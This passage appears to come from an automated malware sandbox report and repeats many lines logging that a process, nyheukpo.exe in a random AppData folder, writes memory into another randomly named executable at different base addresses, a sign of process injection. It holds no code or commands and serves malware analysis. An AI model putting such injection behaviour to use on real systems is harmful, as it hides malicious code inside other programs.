Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25E0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2621778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 262178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2621BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2621BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C10000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C51778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C5178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C51BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C51BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 790000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 7D1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 7D178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 7D1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 7D1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 390000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3D1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3D178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3D1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3D1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D61778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D6178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D61BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D61BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24E0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2521778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 252178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2521BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2521BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2510000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2551778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 255178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2551BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2551BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2550000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2591778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 259178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2591BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2591BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2460000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24A1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24A178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24A1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24A1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29F0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A31778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A3178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A31BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A31BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2090000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20D1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20D178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20D1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20D1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20A0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20E1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20E178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20E1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20E1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C90000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CD1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CD178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CD1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CD1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26A0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26E1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26E178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26E1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26E1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E00000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E41778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E4178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E41BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E41BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2280000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 22C1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 22C178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 22C1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 22C1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26F1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26F178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26F1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26F1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CC0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D01778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D0178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D01BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D01BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3090000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 30D1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 30D178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 30D1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 30D1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: FE0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1021778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 102178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1021BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1021BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2980000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29C1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29C178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29C1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29C1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EC0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F01778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F0178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F01BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F01BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2DF0000	Jump to behavior
